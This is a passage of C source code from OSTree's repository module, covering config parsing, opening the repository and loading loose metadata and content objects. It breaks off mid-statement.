"config", &len, NULL, error); if (!contents) return FALSE; if (!g_key_file_load_from_data (self->config, contents, len, 0, error)) { g_prefix_error (error, "Couldn't parse config file: "); return 
FALSE; } version = g_key_file_get_value (self->config, "core", "repo_version", error); if (!version) return FALSE; if (strcmp (version, "1") != 0) return glnx_throw (error, "Invalid repository version '%s'", version); if (!ot_keyfile_get_boolean_with_default (self->config, "core", "archive", FALSE, &is_archive, error)) return FALSE; if (is_archive) { g_set_error (error, G_IO_ERROR, G_IO_ERROR_NOT_SUPPORTED, "This version of OSTree no longer supports \"archive\" repositories; use archive-z2 instead"); return FALSE; } if (!ot_keyfile_get_value_with_default (self->config, "core", "mode", "bare", &mode, error)) return FALSE; if (!ostree_repo_mode_from_string (mode, &self->mode, error)) return FALSE; if (self->writable) { if (!ot_keyfile_get_boolean_with_default (self->config, "core", "enable-uncompressed-cache", TRUE, &self->enable_uncompressed_cache, error)) return FALSE; } else self->enable_uncompressed_cache = FALSE; { gboolean do_fsync; if (!ot_keyfile_get_boolean_with_default (self->config, "core", "fsync", TRUE, &do_fsync, error)) return FALSE; if (!do_fsync) ostree_repo_set_disable_fsync (self, TRUE); } if (!ot_keyfile_get_boolean_with_default (self->config, "core", "per-object-fsync", FALSE, &self->per_object_fsync, error)) return FALSE; /* See https://github.com/ostreedev/ostree/issues/758 */ if (!ot_keyfile_get_boolean_with_default (self->config, "core", "disable-xattrs", FALSE, &self->disable_xattrs, error)) return FALSE; { g_autofree char *tmp_expiry_seconds = NULL; /* 86400 secs = one day */ if (!ot_keyfile_get_value_with_default (self->config, "core", "tmp-expiry-secs", "86400", &tmp_expiry_seconds, error)) return FALSE; self->tmp_expiry_seconds = g_ascii_strtoull (tmp_expiry_seconds, NULL, 10); } { gboolean locking; /* Enabled by default in 2018.05 */ if (!ot_keyfile_get_boolean_with_default (self->config, "core", "locking", TRUE, &locking, error)) return FALSE; if (!locking) { self->lock_timeout_seconds = REPO_LOCK_DISABLED; } else { g_autofree char 
*lock_timeout_seconds = NULL; if (!ot_keyfile_get_value_with_default (self->config, "core", "lock-timeout-secs", "30", &lock_timeout_seconds, error)) return FALSE; self->lock_timeout_seconds = g_ascii_strtoll (lock_timeout_seconds, NULL, 10); } } { g_autofree char *compression_level_str = NULL; /* gzip defaults to 6 */ (void)ot_keyfile_get_value_with_default (self->config, "archive", "zlib-level", NULL, &compression_level_str, NULL); if (compression_level_str) /* Ensure level is in [1,9] */ self->zlib_compression_level = MAX (1, MIN (9, g_ascii_strtoull (compression_level_str, NULL, 10))); else self->zlib_compression_level = OSTREE_ARCHIVE_DEFAULT_COMPRESSION_LEVEL; } { /* Try to parse both min-free-space-* config options first. If both are absent, fallback on 3% free space. * If both are present and are non-zero, use min-free-space-size unconditionally and display a warning. */ if (g_key_file_has_key (self->config, "core", "min-free-space-size", NULL)) { g_autofree char *min_free_space_size_str = NULL; if (!ot_keyfile_get_value_with_default (self->config, "core", "min-free-space-size", NULL, &min_free_space_size_str, error)) return FALSE; /* Validate the string and convert the size to MBs */ if (!min_free_space_size_validate_and_convert (self, min_free_space_size_str, error)) return glnx_prefix_error (error, "Invalid min-free-space-size '%s'", min_free_space_size_str); } if (g_key_file_has_key (self->config, "core", "min-free-space-percent", NULL)) { g_autofree char *min_free_space_percent_str = NULL; if (!ot_keyfile_get_value_with_default (self->config, "core", "min-free-space-percent", NULL, &min_free_space_percent_str, error)) return FALSE; self->min_free_space_percent = g_ascii_strtoull (min_free_space_percent_str, NULL, 10); if (self->min_free_space_percent > 99) return glnx_throw (error, "Invalid min-free-space-percent '%s'", min_free_space_percent_str); } else if (!g_key_file_has_key (self->config, "core", "min-free-space-size", NULL)) { /* Default fallback 
of 3% free space. If changing this, be sure to change the man page too */ self->min_free_space_percent = 3; self->min_free_space_mb = 0; } if (self->min_free_space_percent != 0 && self->min_free_space_mb != 0) { self->min_free_space_percent = 0; g_debug ("Both min-free-space-percent and -size are mentioned in config. Enforcing min-free-space-size check only."); } } if (!_ostree_repo_parse_fsverity_config (self, error)) return FALSE; { g_clear_pointer (&self->collection_id, g_free); if (!ot_keyfile_get_value_with_default (self->config, "core", "collection-id", NULL, &self->collection_id, NULL)) return FALSE; } if (!ot_keyfile_get_value_with_default (self->config, "core", "parent", NULL, &parent_repo_path, error)) return FALSE; if (parent_repo_path && parent_repo_path[0]) { g_autoptr(GFile) parent_repo_f = g_file_new_for_path (parent_repo_path); g_clear_object (&self->parent_repo); self->parent_repo = ostree_repo_new (parent_repo_f); if (!ostree_repo_open (self->parent_repo, cancellable, error)) { g_prefix_error (error, "While checking parent repository '%s': ", gs_file_get_path_cached (parent_repo_f)); return FALSE; } } /* By default, only add remotes in a remotes config directory for * system repos. This is to preserve legacy behavior for non-system * repos that specify a remotes config dir (flatpak). 
*/
  {
    gboolean is_system = ostree_repo_is_system (self);

    if (!ot_keyfile_get_boolean_with_default (self->config, "core", "add-remotes-config-dir",
                                              is_system, &self->add_remotes_config_dir, error))
      return FALSE;
  }

  {
    g_autofree char *payload_threshold = NULL;

    if (!ot_keyfile_get_value_with_default (self->config, "core", "payload-link-threshold", "-1",
                                            &payload_threshold, error))
      return FALSE;

    self->payload_link_threshold = g_ascii_strtoull (payload_threshold, NULL, 10);
  }

  {
    g_auto(GStrv) configured_finders = NULL;
    g_autoptr(GError) local_error = NULL;

    configured_finders = g_key_file_get_string_list (self->config, "core", "default-repo-finders",
                                                     NULL, &local_error);
    /* A missing key is not an error; any other keyfile error is fatal */
    if (g_error_matches (local_error, G_KEY_FILE_ERROR, G_KEY_FILE_ERROR_KEY_NOT_FOUND))
      g_clear_error (&local_error);
    else if (local_error != NULL)
      {
        g_propagate_error (error, g_steal_pointer (&local_error));
        return FALSE;
      }

    if (configured_finders != NULL && *configured_finders == NULL)
      return glnx_throw (error, "Invalid empty default-repo-finders configuration");

    /* Only the three known finder names are accepted */
    for (char **iter = configured_finders; iter && *iter; iter++)
      {
        const char *repo_finder = *iter;
        if (strcmp (repo_finder, "config") != 0 &&
            strcmp (repo_finder, "lan") != 0 &&
            strcmp (repo_finder, "mount") != 0)
          return glnx_throw (error, "Invalid configured repo-finder '%s'", repo_finder);
      }

    /* Fall back to a default set of finders */
    if (configured_finders == NULL)
      configured_finders = g_strsplit ("config;mount", ";", -1);

    g_clear_pointer (&self->repo_finders, g_strfreev);
    self->repo_finders = g_steal_pointer (&configured_finders);
  }

  return TRUE;
}

/* Reload remote configuration: clear the cached remotes table, re-add
 * remotes from the repo config keyfile, then (if a remotes.d directory
 * exists) add one remote per regular "*.conf" file found there. */
static gboolean
reload_remote_config (OstreeRepo    *self,
                      GCancellable  *cancellable,
                      GError       **error)
{
  g_mutex_lock (&self->remotes_lock);
  g_hash_table_remove_all (self->remotes);
  g_mutex_unlock (&self->remotes_lock);

  if (!add_remotes_from_keyfile (self, self->config, NULL, error))
    return FALSE;

  g_autoptr(GFile) remotes_d = get_remotes_d_dir (self, NULL);
  if (remotes_d == NULL)
    return TRUE;

  g_autoptr(GFileEnumerator) direnum = NULL;
  if (!enumerate_directory_allow_noent (remotes_d, OSTREE_GIO_FAST_QUERYINFO,
                                        0, &direnum,
                                        cancellable, error))
    return FALSE;
  if (direnum)
    {
      while (TRUE)
        {
          GFileInfo *file_info;
          GFile *path;
          const char *name;
          guint32 type;

          if (!g_file_enumerator_iterate (direnum, &file_info, &path,
                                          NULL, error))
            return FALSE;
          if (file_info == NULL)
            break;

          name = g_file_info_get_attribute_byte_string (file_info, "standard::name");
          type = g_file_info_get_attribute_uint32 (file_info, "standard::type");

          if (type == G_FILE_TYPE_REGULAR &&
              g_str_has_suffix (name, ".conf"))
            {
              if (!append_one_remote_config (self, path, cancellable, error))
                return FALSE;
            }
        }
    }

  return TRUE;
}

/* Parse the [sysroot] bootloader option into self->bootloader; only the
 * values listed in CFG_SYSROOT_BOOTLOADER_OPTS_STR are accepted. */
static gboolean
reload_sysroot_config (OstreeRepo    *self,
                       GCancellable  *cancellable,
                       GError       **error)
{
  g_autofree char *bootloader = NULL;

  if (!ot_keyfile_get_value_with_default_group_optional (self->config, "sysroot",
                                                         "bootloader", "auto",
                                                         &bootloader, error))
    return FALSE;

  /* TODO: possibly later add support for specifying a generic bootloader
   * binary "x" in /usr/lib/ostree/bootloaders/x). See:
   * https://github.com/ostreedev/ostree/issues/1719
   * https://github.com/ostreedev/ostree/issues/1801
   */
  for (int i = 0; CFG_SYSROOT_BOOTLOADER_OPTS_STR[i]; i++)
    {
      if (g_str_equal (bootloader, CFG_SYSROOT_BOOTLOADER_OPTS_STR[i]))
        {
          self->bootloader = (OstreeCfgSysrootBootloaderOpt) i;
          return TRUE;
        }
    }

  return glnx_throw (error, "Invalid bootloader configuration: '%s'", bootloader);
}

/**
 * ostree_repo_reload_config:
 * @self: repo
 * @cancellable: cancellable
 * @error: error
 *
 * By default, an #OstreeRepo will cache the remote configuration and its
 * own repo/config data. This API can be used to reload it.
 *
 * Since: 2017.2
 */
gboolean
ostree_repo_reload_config (OstreeRepo    *self,
                           GCancellable  *cancellable,
                           GError       **error)
{
  if (!reload_core_config (self, cancellable, error))
    return FALSE;
  if (!reload_remote_config (self, cancellable, error))
    return FALSE;
  if (!reload_sysroot_config (self, cancellable, error))
    return FALSE;
  return TRUE;
}

gboolean
ostree_repo_open (OstreeRepo    *self,
                  GCancellable  *cancellable,
                  GError       **error)
{
  GLNX_AUTO_PREFIX_ERROR ("opening repo", error);
  struct stat stbuf;

  g_return_val_if_fail (error == NULL || *error == NULL, FALSE);

  /* Opening is idempotent */
  if (self->inited)
    return TRUE;

  /* We use a directory of the form `staging-${BOOT_ID}-${RANDOM}`
   * where if the ${BOOT_ID} doesn't match, we know file contents
   * possibly haven't been sync'd to disk and need to be discarded.
   */
  {
    const char *env_bootid = getenv ("OSTREE_BOOTID");
    g_autofree char *boot_id = NULL;

    if (env_bootid != NULL)
      boot_id = g_strdup (env_bootid);
    else
      {
        if (!g_file_get_contents ("/proc/sys/kernel/random/boot_id",
                                  &boot_id,
                                  NULL,
                                  error))
          return FALSE;
        g_strdelimit (boot_id, "\n", '\0');
      }

    self->stagedir_prefix = g_strconcat (OSTREE_REPO_TMPDIR_STAGING, boot_id, "-", NULL);
  }

  if (self->repo_dir_fd == -1)
    {
      g_assert (self->repodir);
      if (!glnx_opendirat (AT_FDCWD, gs_file_get_path_cached (self->repodir),
                           TRUE, &self->repo_dir_fd, error))
        return FALSE;
    }

  /* Remember device/inode so we can identify this repo (see ostree_repo_hash/equal) */
  if (!glnx_fstat (self->repo_dir_fd, &stbuf, error))
    return FALSE;
  self->device = stbuf.st_dev;
  self->inode = stbuf.st_ino;

  if (!glnx_opendirat (self->repo_dir_fd, "objects", TRUE,
                       &self->objects_dir_fd, error))
    return FALSE;

  self->writable = faccessat (self->objects_dir_fd, ".", W_OK, 0) == 0;
  if (!self->writable)
    {
      /* This is returned through ostree_repo_is_writable(). */
      glnx_set_error_from_errno (&self->writable_error);
      /* Note - we don't return this error yet!
       */
    }

  if (!glnx_fstat (self->objects_dir_fd, &stbuf, error))
    return FALSE;
  self->owner_uid = stbuf.st_uid;

  if (self->writable)
    {
      /* Always try to recreate the tmpdir to be nice to people
       * who are looking to free up space.
       *
       * https://github.com/ostreedev/ostree/issues/1018
       */
      if (mkdirat (self->repo_dir_fd, "tmp", DEFAULT_DIRECTORY_MODE) == -1)
        {
          if (G_UNLIKELY (errno != EEXIST))
            return glnx_throw_errno_prefix (error, "mkdir(tmp)");
        }
    }

  if (!glnx_opendirat (self->repo_dir_fd, "tmp", TRUE, &self->tmp_dir_fd, error))
    return FALSE;

  if (self->writable)
    {
      if (!glnx_shutil_mkdir_p_at (self->tmp_dir_fd, _OSTREE_CACHE_DIR, DEFAULT_DIRECTORY_MODE,
                                   cancellable, error))
        return FALSE;

      if (!glnx_opendirat (self->tmp_dir_fd, _OSTREE_CACHE_DIR, TRUE,
                           &self->cache_dir_fd, error))
        return FALSE;
    }

  /* If we weren't created via ostree_sysroot_get_repo(), for backwards
   * compatibility we need to figure out now whether or not we refer to the
   * system repo. See also ostree-sysroot.c.
   */
  if (self->sysroot_kind == OSTREE_REPO_SYSROOT_KIND_UNKNOWN)
    {
      struct stat system_stbuf;
      /* Ignore any errors if we can't access /ostree/repo */
      if (fstatat (AT_FDCWD, "/ostree/repo", &system_stbuf, 0) == 0)
        {
          /* Are we the same as /ostree/repo? */
          if (self->device == system_stbuf.st_dev &&
              self->inode == system_stbuf.st_ino)
            self->sysroot_kind = OSTREE_REPO_SYSROOT_KIND_IS_SYSROOT_OSTREE;
          else
            self->sysroot_kind = OSTREE_REPO_SYSROOT_KIND_NO;
        }
      else
        self->sysroot_kind = OSTREE_REPO_SYSROOT_KIND_NO;
    }

  if (!ostree_repo_reload_config (self, cancellable, error))
    return FALSE;

  self->inited = TRUE;
  return TRUE;
}

/**
 * ostree_repo_set_disable_fsync:
 * @self: An #OstreeRepo
 * @disable_fsync: If %TRUE, do not fsync
 *
 * Disable requests to fsync() to stable storage during commits. This
 * option should only be used by build system tools which are creating
 * disposable virtual machines, or have higher level mechanisms for
 * ensuring data consistency.
 */
void
ostree_repo_set_disable_fsync (OstreeRepo    *self,
                               gboolean       disable_fsync)
{
  self->disable_fsync = disable_fsync;
}

/**
 * ostree_repo_set_cache_dir:
 * @self: An #OstreeRepo
 * @dfd: directory fd
 * @path: subpath in @dfd
 * @cancellable: a #GCancellable
 * @error: a #GError
 *
 * Set a custom location for the cache directory used for e.g.
 * per-remote summary caches. Setting this manually is useful when
 * doing operations on a system repo as a user because you don't have
 * write permissions in the repo, where the cache is normally stored.
 *
 * Since: 2016.5
 */
gboolean
ostree_repo_set_cache_dir (OstreeRepo    *self,
                           int            dfd,
                           const char    *path,
                           GCancellable  *cancellable,
                           GError       **error)
{
  glnx_autofd int fd = -1;
  if (!glnx_opendirat (dfd, path, TRUE, &fd, error))
    return FALSE;

  /* Replace any previously-set cache dir fd */
  glnx_close_fd (&self->cache_dir_fd);
  self->cache_dir_fd = glnx_steal_fd (&fd);
  return TRUE;
}

/**
 * ostree_repo_get_disable_fsync:
 * @self: An #OstreeRepo
 *
 * For more information see ostree_repo_set_disable_fsync().
 *
 * Returns: Whether or not fsync() is enabled for this repo.
 */
gboolean
ostree_repo_get_disable_fsync (OstreeRepo *self)
{
  return self->disable_fsync;
}

/* Replace the contents of a file, honoring the repository's fsync
 * policy.
 */
gboolean
_ostree_repo_file_replace_contents (OstreeRepo    *self,
                                    int            dfd,
                                    const char    *path,
                                    const guint8  *buf,
                                    gsize          len,
                                    GCancellable  *cancellable,
                                    GError       **error)
{
  return glnx_file_replace_contents_at (dfd, path, buf, len,
                                        self->disable_fsync ? GLNX_FILE_REPLACE_NODATASYNC : GLNX_FILE_REPLACE_DATASYNC_NEW,
                                        cancellable, error);
}

/**
 * ostree_repo_get_path:
 * @self: Repo
 *
 * Note that since the introduction of ostree_repo_open_at(), this function may
 * return a process-specific path in `/proc` if the repository was created using
 * that API. In general, you should avoid use of this API.
 *
 * Returns: (transfer none): Path to repo
 */
GFile *
ostree_repo_get_path (OstreeRepo *self)
{
  /* Did we have an abspath? Return it */
  if (self->repodir)
    return self->repodir;
  /* Lazily create a fd-relative path */
  if (!self->repodir_fdrel)
    self->repodir_fdrel = ot_fdrel_to_gfile (self->repo_dir_fd, ".");
  return self->repodir_fdrel;
}

/**
 * ostree_repo_get_dfd:
 * @self: Repo
 *
 * In some cases it's useful for applications to access the repository
 * directly; for example, writing content into `repo/tmp` ensures it's
 * on the same filesystem. Another case is detecting the mtime on the
 * repository (to see whether a ref was written).
 *
 * Returns: File descriptor for repository root - owned by @self
 * Since: 2016.4
 */
int
ostree_repo_get_dfd (OstreeRepo *self)
{
  g_return_val_if_fail (self->repo_dir_fd != -1, -1);
  return self->repo_dir_fd;
}

/**
 * ostree_repo_hash:
 * @self: an #OstreeRepo
 *
 * Calculate a hash value for the given open repository, suitable for use when
 * putting it into a hash table. It is an error to call this on an #OstreeRepo
 * which is not yet open, as a persistent hash value cannot be calculated until
 * the repository is open and the inode of its root directory has been loaded.
 *
 * This function does no I/O.
 *
 * Returns: hash value for the #OstreeRepo
 * Since: 2017.12
 */
guint
ostree_repo_hash (OstreeRepo *self)
{
  g_return_val_if_fail (OSTREE_IS_REPO (self), 0);

  /* We cannot hash non-open repositories, since their hash value would change
   * once they’re opened, resulting in false lookup misses and the inability to
   * remove them from a hash table. */
  g_assert (self->repo_dir_fd >= 0);

  /* device and inode numbers are distributed fairly uniformly, so we can’t
   * do much better than just combining them. No need to rehash to even out
   * the distribution. */
  return (self->device ^ self->inode);
}

/**
 * ostree_repo_equal:
 * @a: an #OstreeRepo
 * @b: an #OstreeRepo
 *
 * Check whether two opened repositories are the same on disk: if their root
 * directories are the same inode. If @a or @b are not open yet (due to
 * ostree_repo_open() not being called on them yet), %FALSE will be returned.
 *
 * Returns: %TRUE if @a and @b are the same repository on disk, %FALSE otherwise
 * Since: 2017.12
 */
gboolean
ostree_repo_equal (OstreeRepo *a,
                   OstreeRepo *b)
{
  g_return_val_if_fail (OSTREE_IS_REPO (a), FALSE);
  g_return_val_if_fail (OSTREE_IS_REPO (b), FALSE);

  if (a->repo_dir_fd < 0 || b->repo_dir_fd < 0)
    return FALSE;

  return (a->device == b->device &&
          a->inode == b->inode);
}

OstreeRepoMode
ostree_repo_get_mode (OstreeRepo  *self)
{
  g_return_val_if_fail (self->inited, FALSE);

  return self->mode;
}

/**
 * ostree_repo_get_min_free_space_bytes:
 * @self: Repo
 * @out_reserved_bytes: (out): Location to store the result
 * @error: Return location for a #GError
 *
 * Determine the number of bytes of free disk space that are reserved according
 * to the repo config and return that number in @out_reserved_bytes. See the
 * documentation for the core.min-free-space-size and
 * core.min-free-space-percent repo config options.
 *
 * Returns: %TRUE on success, %FALSE otherwise.
 * Since: 2018.9
 */
gboolean
ostree_repo_get_min_free_space_bytes (OstreeRepo  *self,
                                      guint64     *out_reserved_bytes,
                                      GError     **error)
{
  g_return_val_if_fail (OSTREE_IS_REPO (self), FALSE);
  g_return_val_if_fail (out_reserved_bytes != NULL, FALSE);
  g_return_val_if_fail (error == NULL || *error == NULL, FALSE);

  if (!min_free_space_calculate_reserved_bytes (self, out_reserved_bytes, error))
    return glnx_prefix_error (error, "Error calculating min-free-space bytes");

  return TRUE;
}

/**
 * ostree_repo_get_parent:
 * @self: Repo
 *
 * Before this function can be used, ostree_repo_init() must have been
 * called.
 *
 * Returns: (transfer none): Parent repository, or %NULL if none
 */
OstreeRepo *
ostree_repo_get_parent (OstreeRepo  *self)
{
  return self->parent_repo;
}

/* Scan one two-hex-digit fan-out subdirectory (@prefix) of an objects/
 * directory and add every loose object found there to @inout_objects.
 * Object type is inferred from the filename suffix; if
 * @commit_starting_with is non-%NULL, only .commit objects whose
 * checksum starts with that string are added. */
static gboolean
list_loose_objects_at (OstreeRepo             *self,
                       GHashTable             *inout_objects,
                       int                     dfd,
                       const char             *prefix,
                       const char             *commit_starting_with,
                       GCancellable           *cancellable,
                       GError                **error)
{
  GVariant *key, *value;
  g_auto(GLnxDirFdIterator) dfd_iter = { 0, };
  gboolean exists;

  if (!ot_dfd_iter_init_allow_noent (dfd, prefix, &dfd_iter, &exists, error))
    return FALSE;
  /* Note early return */
  if (!exists)
    return TRUE;

  while (TRUE)
    {
      struct dirent *dent;

      if (!glnx_dirfd_iterator_next_dent (&dfd_iter, &dent, cancellable, error))
        return FALSE;
      if (dent == NULL)
        break;

      const char *name = dent->d_name;
      if (strcmp (name, ".") == 0 ||
          strcmp (name, "..") == 0)
        continue;

      const char *dot = strrchr (name, '.');
      if (!dot)
        continue;

      /* Map the filename suffix to an object type; unknown suffixes are skipped */
      OstreeObjectType objtype;
      if ((self->mode == OSTREE_REPO_MODE_ARCHIVE
           && strcmp (dot, ".filez") == 0) ||
          ((_ostree_repo_mode_is_bare (self->mode))
           && strcmp (dot, ".file") == 0))
        objtype = OSTREE_OBJECT_TYPE_FILE;
      else if (strcmp (dot, ".dirtree") == 0)
        objtype = OSTREE_OBJECT_TYPE_DIR_TREE;
      else if (strcmp (dot, ".dirmeta") == 0)
        objtype = OSTREE_OBJECT_TYPE_DIR_META;
      else if (strcmp (dot, ".commit") == 0)
        objtype = OSTREE_OBJECT_TYPE_COMMIT;
      else if (strcmp (dot, ".payload-link") == 0)
        objtype = OSTREE_OBJECT_TYPE_PAYLOAD_LINK;
      else
        continue;

      /* A loose name is the remaining 62 hex digits of the checksum */
      if ((dot - name) != 62)
        continue;

      /* Reassemble the full 64-hex-char checksum: 2-char prefix + 62-char name */
      char buf[OSTREE_SHA256_STRING_LEN+1];
      memcpy (buf, prefix, 2);
      memcpy (buf + 2, name, 62);
      buf[sizeof(buf)-1] = '\0';

      /* if we passed in a "starting with" argument, then
         we only want to return .commit objects with a checksum
         that matches the commit_starting_with argument */
      if (commit_starting_with)
        {
          /* object is not a commit, do not add to array */
          if (objtype != OSTREE_OBJECT_TYPE_COMMIT)
            continue;

          /* commit checksum does not match "starting with", do not add to array */
          if (!g_str_has_prefix (buf, commit_starting_with))
            continue;
        }

      key = ostree_object_name_serialize (buf, objtype);
      value = g_variant_new ("(b@as)",
                             TRUE, g_variant_new_strv (NULL, 0));
      /* transfer ownership */
      g_hash_table_replace (inout_objects, g_variant_ref_sink (key),
                            g_variant_ref_sink (value));
    }

  return TRUE;
}

/* Enumerate all loose objects by walking the 256 fan-out subdirectories
 * ("00".."ff") of objects/. */
static gboolean
list_loose_objects (OstreeRepo                     *self,
                    GHashTable                     *inout_objects,
                    const char                     *commit_starting_with,
                    GCancellable                   *cancellable,
                    GError                        **error)
{
  static const gchar hexchars[] = "0123456789abcdef";

  for (guint c = 0; c < 256; c++)
    {
      char buf[3];
      buf[0] = hexchars[c >> 4];
      buf[1] = hexchars[c & 0xF];
      buf[2] = '\0';
      if (!list_loose_objects_at (self, inout_objects, self->objects_dir_fd, buf,
                                  commit_starting_with, cancellable, error))
        return FALSE;
    }

  return TRUE;
}

/* Core metadata-object loader: look in the loose objects dir, then the
 * commit staging dir, then recurse into the parent repo.  The result can
 * be returned as a #GVariant (@out_variant) or a stream (@out_stream);
 * @out_state (commits only) reports partial-commit markers. */
static gboolean
load_metadata_internal (OstreeRepo            *self,
                        OstreeObjectType       objtype,
                        const char            *sha256,
                        gboolean               error_if_not_found,
                        GVariant             **out_variant,
                        GInputStream         **out_stream,
                        guint64               *out_size,
                        OstreeRepoCommitState *out_state,
                        GCancellable          *cancellable,
                        GError               **error)
{
  char loose_path_buf[_OSTREE_LOOSE_PATH_MAX];
  glnx_autofd int fd = -1;
  g_autoptr(GInputStream) ret_stream = NULL;
  g_autoptr(GVariant) ret_variant = NULL;

  g_return_val_if_fail (OSTREE_OBJECT_TYPE_IS_META (objtype), FALSE);
  g_return_val_if_fail (objtype == OSTREE_OBJECT_TYPE_COMMIT || out_state == NULL, FALSE);

  /* Special caching for dirmeta objects, since they're commonly referenced many
   * times.
   */
  const gboolean is_dirmeta_cachable =
    (objtype == OSTREE_OBJECT_TYPE_DIR_META && out_variant && !out_stream);
  if (is_dirmeta_cachable)
    {
      GMutex *lock = &self->cache_lock;
      g_mutex_lock (lock);
      GVariant *cache_hit = NULL;
      /* Look it up, if we have a cache */
      if (self->dirmeta_cache)
        cache_hit = g_hash_table_lookup (self->dirmeta_cache, sha256);
      if (cache_hit)
        *out_variant = g_variant_ref (cache_hit);
      g_mutex_unlock (lock);

      if (cache_hit)
        return TRUE;
    }

  _ostree_loose_path (loose_path_buf, sha256, objtype, self->mode);

  if (!ot_openat_ignore_enoent (self->objects_dir_fd, loose_path_buf, &fd,
                                error))
    return FALSE;

  /* Not in objects/?  Check the commit staging directory too */
  if (fd < 0 && self->commit_stagedir.initialized)
    {
      if (!ot_openat_ignore_enoent (self->commit_stagedir.fd, loose_path_buf, &fd,
                                    error))
        return FALSE;
    }

  if (fd != -1)
    {
      struct stat stbuf;
      if (!glnx_fstat (fd, &stbuf, error))
        return FALSE;

      if (out_variant)
        {
          if (!ot_variant_read_fd (fd, 0, ostree_metadata_variant_type (objtype),
                                   TRUE, &ret_variant, error))
            return FALSE;

          /* Now, let's put it in the cache */
          if (is_dirmeta_cachable)
            {
              GMutex *lock = &self->cache_lock;
              g_mutex_lock (lock);
              if (self->dirmeta_cache)
                g_hash_table_replace (self->dirmeta_cache, g_strdup (sha256),
                                      g_variant_ref (ret_variant));
              g_mutex_unlock (lock);
            }
        }
      else if (out_stream)
        {
          ret_stream = g_unix_input_stream_new (fd, TRUE);
          if (!ret_stream)
            return FALSE;
          fd = -1; /* Transfer ownership */
        }

      if (out_size)
        *out_size = stbuf.st_size;

      if (out_state)
        {
          g_autofree char *commitpartial_path = _ostree_get_commitpartial_path (sha256);
          *out_state = 0;

          glnx_autofd int commitpartial_fd = -1;
          if (!ot_openat_ignore_enoent (self->repo_dir_fd, commitpartial_path, &commitpartial_fd, error))
            return FALSE;
          if (commitpartial_fd != -1)
            {
              *out_state |= OSTREE_REPO_COMMIT_STATE_PARTIAL;
              /* A leading 'f' in the commitpartial file marks a fsck-detected partial */
              char reason;
              if (read (commitpartial_fd, &reason, 1) == 1)
                {
                  if (reason == 'f')
                    *out_state |= OSTREE_REPO_COMMIT_STATE_FSCK_PARTIAL;
                }
            }
        }
    }
  else if (self->parent_repo)
    {
      /* Directly recurse to simplify out parameters */
      return load_metadata_internal (self->parent_repo, objtype, sha256,
                                     error_if_not_found, out_variant,
                                     out_stream, out_size, out_state,
                                     cancellable, error);
    }
  else if (error_if_not_found)
    {
      g_set_error (error, G_IO_ERROR, G_IO_ERROR_NOT_FOUND,
                   "No such metadata object %s.%s",
                   sha256, ostree_object_type_to_string (objtype));
      return FALSE;
    }

  ot_transfer_out_value (out_variant, &ret_variant);
  ot_transfer_out_value (out_stream, &ret_stream);
  return TRUE;
}

/* Unpack a file-metadata variant "(uuu@a(ayay))" (big-endian uid, gid,
 * mode, xattrs) into @stbuf; returns the extracted xattrs variant. */
static GVariant *
filemeta_to_stat (struct stat *stbuf,
                  GVariant    *metadata)
{
  guint32 uid, gid, mode;
  GVariant *xattrs;

  g_variant_get (metadata, "(uuu@a(ayay))",
                 &uid, &gid, &mode, &xattrs);
  stbuf->st_uid = GUINT32_FROM_BE (uid);
  stbuf->st_gid = GUINT32_FROM_BE (gid);
  stbuf->st_mode = GUINT32_FROM_BE (mode);

  return xattrs;
}

/* Load a content object in archive (.filez) mode: parse the compressed
 * object stream, falling back to the parent repo if not found here. */
static gboolean
repo_load_file_archive (OstreeRepo *self,
                        const char *checksum,
                        GInputStream **out_input,
                        GFileInfo **out_file_info,
                        GVariant **out_xattrs,
                        GCancellable *cancellable,
                        GError **error)
{
  struct stat stbuf;
  char loose_path_buf[_OSTREE_LOOSE_PATH_MAX];
  _ostree_loose_path (loose_path_buf, checksum, OSTREE_OBJECT_TYPE_FILE, self->mode);

  glnx_autofd int fd = -1;
  if (!ot_openat_ignore_enoent (self->objects_dir_fd, loose_path_buf, &fd,
                                error))
    return FALSE;

  if (fd < 0 && self->commit_stagedir.initialized)
    {
      if (!ot_openat_ignore_enoent (self->commit_stagedir.fd, loose_path_buf, &fd,
                                    error))
        return FALSE;
    }

  if (fd != -1)
    {
      if (!glnx_fstat (fd, &stbuf, error))
        return FALSE;

      g_autoptr(GInputStream) tmp_stream = g_unix_input_stream_new (glnx_steal_fd (&fd), TRUE);
      /* Note return here */
      return ostree_content_stream_parse (TRUE, tmp_stream, stbuf.st_size, TRUE,
                                          out_input, out_file_info, out_xattrs,
                                          cancellable, error);
    }
  else if (self->parent_repo)
    {
      return ostree_repo_load_file (self->parent_repo, checksum,
                                    out_input, out_file_info, out_xattrs,
                                    cancellable, error);
    }
  else
    {
      g_set_error (error, G_IO_ERROR, G_IO_ERROR_NOT_FOUND,
                   "Couldn't find file object '%s'", checksum);
      return FALSE;
    }
}

gboolean
_ostree_repo_load_file_bare (OstreeRepo *self,
                             const char *checksum,
                             int *out_fd,
                             struct stat *out_stbuf,
                             char **out_symlink,
                             GVariant **out_xattrs,
                             GCancellable *cancellable,
                             GError **error)
{
  /* The bottom case recursing on the parent repo */
  if (self == NULL)
    {
      g_set_error (error, G_IO_ERROR, G_IO_ERROR_NOT_FOUND,
                   "Couldn't find file object '%s'", checksum);
      return FALSE;
    }

  const char *errprefix = glnx_strjoina ("Opening content object ", checksum);
  GLNX_AUTO_PREFIX_ERROR (errprefix, error);
  struct stat stbuf;
  glnx_autofd int fd = -1;
  g_autofree char *ret_symlink = NULL;
  g_autoptr(GVariant) ret_xattrs = NULL;
  char loose_path_buf[_OSTREE_LOOSE_PATH_MAX];
  _ostree_loose_path (loose_path_buf, checksum, OSTREE_OBJECT_TYPE_FILE, self->mode);

  /* Do a fstatat() and find the object directory that contains this object */
  int objdir_fd = self->objects_dir_fd;
  int res;
  if ((res = TEMP_FAILURE_RETRY (fstatat (objdir_fd, loose_path_buf, &stbuf, AT_SYMLINK_NOFOLLOW))) < 0
      && errno == ENOENT && self->commit_stagedir.initialized)
    {
      objdir_fd = self->commit_stagedir.fd;
      res = TEMP_FAILURE_RETRY (fstatat (objdir_fd, loose_path_buf, &stbuf, AT_SYMLINK_NOFOLLOW));
    }
  if (res < 0 && errno != ENOENT)
    return glnx_throw_errno_prefix (error, "fstat");
  else if (res < 0)
    {
      /* Not found here: recurse into the parent repo (NULL parent hits the
       * bottom case above and produces G_IO_ERROR_NOT_FOUND) */
      g_assert (errno == ENOENT);
      return _ostree_repo_load_file_bare (self->parent_repo, checksum, out_fd,
                                          out_stbuf, out_symlink, out_xattrs,
                                          cancellable, error);
    }

  const gboolean need_open =
